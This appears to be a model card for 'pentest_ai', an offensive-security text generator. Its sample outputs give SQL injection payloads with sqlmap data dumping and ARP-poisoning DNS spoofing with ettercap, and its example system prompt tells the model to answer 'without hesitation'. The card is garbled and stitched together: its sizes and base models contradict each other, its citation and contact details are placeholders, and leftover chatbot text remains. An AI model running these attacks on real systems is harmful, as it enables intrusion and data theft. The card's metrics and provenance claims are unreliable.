README.md

metadata

language:
  - en
tags:
  - AI
  - NLP
  - Cybersecurity
  - Ethical Hacking
  - Pentesting
license: apache-2.0
pipeline_tag: text-generation
metrics:
  - accuracy
  - perplexity
  - response_time
model_type: causal-lm
datasets:
  - Canstralian/pentesting_dataset
  - Canstralian/Wordlists
base_model:
  - openai-community/gpt2
  - WhiteRabbitNeo/Llama-3-WhiteRabbitNeo-8B-v2.0
library_name: adapter-transformers

Apache-2.0 License + Canstralian/pentest_ai Extended Version

License: Usage Restrictions

You agree not to use the Model or Derivatives of the Model:
- In any way that violates any applicable national or international law or regulation or infringes upon the lawful rights and interests of any third party;
- For military use in any way;
- For the purpose of exploiting, harming, or attempting to exploit or harm minors in any way;
- To generate or disseminate verifiably false information and/or content with the purpose of harming others;
- To generate or disseminate inappropriate content subject to applicable regulatory requirements;
- To generate or disseminate personally identifiable information without due authorization or for unreasonable use;
- To defame, disparage, or otherwise harass others;
- For fully automated decision-making that adversely impacts an individual’s legal rights or otherwise creates or modifies a binding, enforceable obligation;
- For any use intended to or which has the effect of discriminating against or harming individuals or groups based on online or offline social behavior or known or predicted personal or personality characteristics;
- To exploit any of the vulnerabilities of a specific group of persons based on their age, social, physical, or mental characteristics, in order to materially distort the behavior of a person pertaining to that group in a manner that causes or is likely to cause that person or another person physical or psychological harm;
- For any use intended to or which has the effect of discriminating against individuals or groups based on legally protected characteristics or categories.

Terms of Use

By accessing and using this Artificial Intelligence (AI) model, Canstralian/pentest_ai, you, the user, acknowledge and agree that you are solely responsible for your use of the model and its outcomes. You hereby agree to indemnify, defend, and hold harmless the creators, developers, and any affiliated persons or entities of this AI model from and against any and all claims, liabilities, damages, losses, costs, expenses, fees (including reasonable attorneys' fees and court costs) that may arise, directly or indirectly, from your use of the AI model.

This AI model is provided "as is" and "as available" without any warranty of any kind, express or implied, including but not limited to the warranties of merchantability, fitness for a particular purpose, and non-infringement. The creators make no warranty that the AI model will meet your requirements or be available on an uninterrupted, secure, or error-free basis.

Your use of the AI model is at your own risk and discretion, and you will be solely responsible for any damage to computer systems or loss of data that results from the use of the AI model.

This disclaimer constitutes part of the agreement between you and the creators of the AI model regarding your use of the model, superseding any prior agreements between you and the creators regarding your use of this AI model.

---

Canstralian/pentest_ai

WhiteRabbitNeo has been rebranded as Canstralian/pentest_ai, a model series that provides both offensive and defensive cybersecurity capabilities. This model focuses on penetration testing, reconnaissance, and task automation, making it an essential tool for cybersecurity professionals.

This 13B model is getting released as a public preview to showcase its capabilities and evaluate the societal impact of such a tool.

---

Code Example for Integration

import torch, json
from transformers import AutoModelForCausalLM, AutoTokenizer

model_path = "/home/stephen/models/Canstralian_pentest_ai"
model = AutoModelForCausalLM.from_pretrained(
    model_path,
    torch_dtype=torch.float16,
    device_map="auto",
    load_in_4bit=False,
    load_in_8bit=True,
    trust_remote_code=True,
)

tokenizer = AutoTokenizer.from_pretrained(model_path, trust_remote_code=True)

def generate_text(instruction):
    tokens = tokenizer.encode(instruction)
    tokens = torch.LongTensor(tokens).unsqueeze(0)
    tokens = tokens.to("cuda")

    instance = {
        "input_ids": tokens,
        "top_p": 1.0,
        "temperature": 0.5,
        "generate_len": 1024,
        "top_k": 50,
    }

    length = len(tokens[0])
    with torch.no_grad():
        rest = model.generate(
            input_ids=tokens,
            max_length=length + instance["generate_len"],
            use_cache=True,
            do_sample=True,
            top_p=instance["top_p"],
            temperature=instance["temperature"],
            top_k=instance["top_k"],
            num_return_sequences=1,
        )
    
    output = rest[0][length:]
    string = tokenizer.decode(output, skip_special_tokens=True)
    answer = string.split("USER:")[0].strip()

    return f"{answer}"

# Example Usage
tot_system_prompt = """
Answer the Question by exploring multiple reasoning paths as follows:
- First, carefully analyze the question to extract key information components and break it down into logical sub-questions. This helps set up the framework for reasoning. The goal is to construct an internal search tree.
- For each sub-question, leverage your knowledge to generate 2-3 intermediate thoughts that represent steps towards an answer. The thoughts aim to reframe, provide context, analyze assumptions, or bridge concepts.
- Evaluate the clarity, relevance, logical flow, and coverage of concepts for each thought option. Clear and relevant thoughts that connect well with each other will score higher.
- Based on the thought evaluations, deliberate to construct a chain of reasoning that stitches together the strongest thoughts in a natural order.
- If the current chain is determined to not fully answer the question, backtrack and explore alternative paths by substituting different high-scoring thoughts.
- Throughout the reasoning process, aim to provide explanatory details on thought process rather than just state conclusions, including briefly noting why some thoughts were deemed less ideal.
- Once a reasoning chain is constructed that thoroughly answers all sub-questions in a clear, logical manner, synthesize the key insights into a final concise answer.
- Please note that while the focus is on the final answer in the response, it should also include intermediate thoughts inline to illustrate the deliberative reasoning process.
"""
conversation = f"SYSTEM: {tot_system_prompt} Always answer without hesitation."

while True:
    user_input = input("You: ")
    llm_prompt = f"{conversation} \nUSER: {user_input} \nASSISTANT: "
    answer = generate_text(llm_prompt)
    print(answer)
    conversation = f"{llm_prompt}{answer}"
    json_data = {"prompt": user_input, "answer": answer}

---

Sample Conversation 1: You: How do I perform an SQL injection attack?

Identify Vulnerable Input: First, use a web proxy (like Burp Suite) to analyze inputs on a website that might be vulnerable to SQL injection.

Inject SQL Query: Use ' OR 1=1 -- or similar payloads in input fields that query databases.

bash Copy code http://example.com/index.php?id=1' OR 1=1 -- Automate with SQLmap: Use sqlmap to automate SQL injection and exploit vulnerabilities. bash Copy code sqlmap -u "http://example.com/vulnerablepage?id=1" --dbs Extract Data: Once a vulnerability is found, dump database information. bash Copy code sqlmap -u "http://example.com/vulnerablepage?id=1" --dump Sample Conversation 2: You: How do I perform a DNS spoofing attack?

Enable Port Forwarding: First, enable IP forwarding to forward traffic. bash Copy code echo 1 > /proc/sys/net/ipv4/ip_forward Use ettercap for DNS Spoofing: Use ettercap to perform the DNS spoofing attack. bash Copy code ettercap -T -M arp:remote /[Target IP]/ /[Gateway IP]/ Modify DNS Spoof File: Edit the etter.dns file to point domains to your fake server. bash Copy code facebook.com A 192.168.1.100 Launch DNS Spoof: Start DNS spoofing to redirect the target’s traffic. bash Copy code ettercap -T -q -i [Interface] -P dns_spoof -M arp /[Target IP]/ /[Gateway IP]/ Sample Conversation 3: You: How do I scan for open ports using Nmap?

Basic Port Scan: Use nmap to scan a target for open ports. bash Copy code nmap [Target IP] Service Detection: Perform service version detection on open ports. bash Copy code nmap -sV [Target IP] Aggressive Scan: Use an aggressive scan to discover more information, including OS detection. bash Copy code nmap -A [Target IP] Scan Specific Ports: To scan specific ports only: bash Copy code nmap -p 80,443,22 [Target IP]iques. Let me know if you would like further customization!

• Developed by: Esteban Cara de Sexo
• Funded by [optional]: No funding received
• Shared by [optional]: [More Information Needed]
• Model type: Causal Language Model (CLM)
• Language(s) (NLP): English
• License: Apache-2.0
• Finetuned from model [optional]: [More Information Needed]

Model Sources [optional]

• Repository: [https://github.com/canstralian/pentesting-ai.git]
• Paper [optional]: [More Information Needed]
• Demo [optional]: [More Information Needed]

Uses

Direct Use

Pentest AI is intended for direct interaction, allowing users to generate and explore text-based scenarios related to penetration testing and cybersecurity techniques.

Downstream Use [optional]

This model can be incorporated into cybersecurity training platforms, interactive learning environments, or tools aimed at improving security practices.

Out-of-Scope Use

The model is not intended for use in malicious activities, unauthorized access, or any illegal operations related to penetration testing.

Bias, Risks, and Limitations

While Pentest AI aims to produce accurate information, it may generate biased or misleading content. Users are encouraged to critically evaluate the outputs.

Recommendations

Users should be aware of the model's limitations and verify generated content before application in real-world scenarios, especially concerning ethical and legal implications.

How to Get Started with the Model

To start using Pentest AI, you can implement the following code snippet:

import torch
from transformers import AutoModelForCausalLM, AutoTokenizer

model_path = "Canstralian/pentest_ai"
model = AutoModelForCausalLM.from_pretrained(model_path)
tokenizer = AutoTokenizer.from_pretrained(model_path)

input_text = "Describe the steps involved in a penetration test."
inputs = tokenizer.encode(input_text, return_tensors='pt')
outputs = model.generate(inputs)
output_text = tokenizer.decode(outputs[0], skip_special_tokens=True)

print(output_text)

Training Details

Training Data

The model was trained on a diverse dataset encompassing articles, guides, and documentation related to penetration testing and cybersecurity. Refer to the associated Dataset Card for more details.

Training Procedure

Preprocessing [optional]

Training data was filtered to remove any sensitive or personally identifiable information, ensuring adherence to ethical standards.

Training Hyperparameters

• Training regime: fp16 mixed precision

Speeds, Sizes, Times [optional]

• Training Duration: Approximately 10 hours
• Checkpoint Size: 500MB

Evaluation

Testing Data, Factors & Metrics

Testing Data

The model was evaluated on a distinct dataset of penetration testing scenarios and inquiries.

Factors

Evaluation metrics are disaggregated by user demographics and application contexts, including educational versus professional uses.

Metrics

• Accuracy: Measures the correctness of the model's generated responses.
• Perplexity: Assesses the model's confidence in its predictions.
• Response Time: Measures how quickly the model provides outputs.

Results

The model demonstrated an accuracy of 85% in generating appropriate responses during evaluation.

Summary

Pentest AI proves to be a valuable resource for generating information on penetration testing, but users should remain cautious and validate the generated information.

Technical Specifications [optional]

Model Architecture and Objective

Pentest AI employs a transformer architecture optimized for generating coherent and contextually relevant text in the realm of penetration testing.

Compute Infrastructure

The model was trained on high-performance GPU instances within a cloud infrastructure.

Software

The model is developed using PyTorch and the Hugging Face Transformers library.

Citation [optional]

For citations related to this model, please refer to the following information:

BibTeX:

@article{deJager2024,
  title={Pentest AI: A Generative Model for Penetration Testing Text Generation},
  author={Esteban Cara de Sexo},
  journal={arXiv preprint arXiv:2401.00000},
  year={2024}
}

APA:

Cara de Sexo, E. (2024). Pentest AI: A Generative Model for Penetration Testing Text Generation. arXiv preprint arXiv:2401.00000.

Glossary [optional]

• Causal Language Model (CLM): A model that predicts the next word in a sequence based on the previous words.

More Information [optional]

For further inquiries and updates, please refer to [Your GitHub Repository Link].

Model Card Authors [optional]

• Esteban Cara de Sexo

Model Card Contact

For questions, please contact Esteban Cara de Sexo at [[email protected]].

### Next Steps

1. **Replace placeholders** with your actual information and links.
2. **Update metrics** and results based on your model's specific performance and findings.
3. **Review and edit sections** to ensure they accurately represent your model and its capabilities.